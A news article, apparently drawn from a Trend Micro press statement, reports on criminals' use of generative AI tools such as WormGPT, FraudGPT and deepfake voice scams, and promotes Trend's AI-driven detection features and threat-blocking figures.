Trend Micro highlights dark side of generative AI tools
Trend Micro has shared more details of its ongoing commitment to protect global customers around the world from emerging AI threats.
Mick McCluney, Technical Director at Trend Micro ANZ, says, "AI tools like ChatGPT are taking the world by storm, but the technology is already being used by opportunistic threat actors to take advantage of gaps in enterprise security."
"Trend is leading the way globally in mitigating these threats through a prolific output of groundbreaking research and its own use of AI to supercharge both ASRM and XDR."
According to a statement from the company, Trend successfully blocked 73 billion threats for its global customer base in the first half of 2023, marking a 16% year-on-year increase. Those figures illustrate both the growing power of its threat detection capabilities and the sheer scale of todays threat landscape, the company states.
Emerging malicious AI tools including WormGPT and FraudGPT are already being built on top of open-source generative AI platforms to democratise cyber crime, making hackers more productive and attacks more likely to succeed.
Trend Research recently revealed how threat actors are strengthening impersonation tactics by combining deepfake and AI voice cloning technology with generative AI for more effective virtual virtual kidnapping scams.
Adversaries leverage ChatGPT to filter and fuse large datasets to victim selection, and deepfakes are deployed to deceive victims into believing a close relation has been kidnapped to extort a ransom.
Separate research from Trend uncovered the use of generative AI in training and supporting new threat actors, including activities such as:
- Developing malicious polymorphic code
- Creating detection-resistant malware
- Creating highly convincing phishing emails for business email compromise (BEC) and webpages in multiple languages
- Creating hacking tools
- Identifying and analyse vulnerabilities
- Identifying card data for fraud
- Accelerating tactic and technique learning
According to the company, these tools are continually improved by cyber criminals and made accessible through subscription-based pricing to further reduce barriers to entry for aspiring hackers. The development and deployment of malicious AI has put escalating pressure on security teams to detect and respond to threats earlier and faster to ensure quicker containment and minimal damage.
Empowering security teams to detect and respond to malicious AI use, Trend Vision One leverages its own generative AI through the Companion virtual assistant, in addition to AI app detection models, to help SOC analysts match the speed and polymorphic nature of AI-driven attacks.
It features:
- XDR Incident Feature: Accelerating threat event understanding, saving time spent researching and contextualising alerts. On average it saves three minutes per alert, amounting to several hours per user per week.
- Command-Line Feature: Streamlining and simplifying decoding complex scripts. Analysts save additional time with productivity gains of up to 40 minutes of manual investigation time.
- Search Query Generator: Transforming plain-language search queries into formal search syntax, saving up to one hour of time spent hunting by assisting users with query development and field name, operator and value identification.
Trend has been working on AI-powered solutions with current and planned AI/ML and generative AI investments since 2005, including tooling designed to detect BEC attacks. Its Writing Style DNA technology learns normal email writing style from previous messages and flags when emails deviate from this baseline. It blocked more than 130,000 BEC attacks for customers in this manner throughout 2022.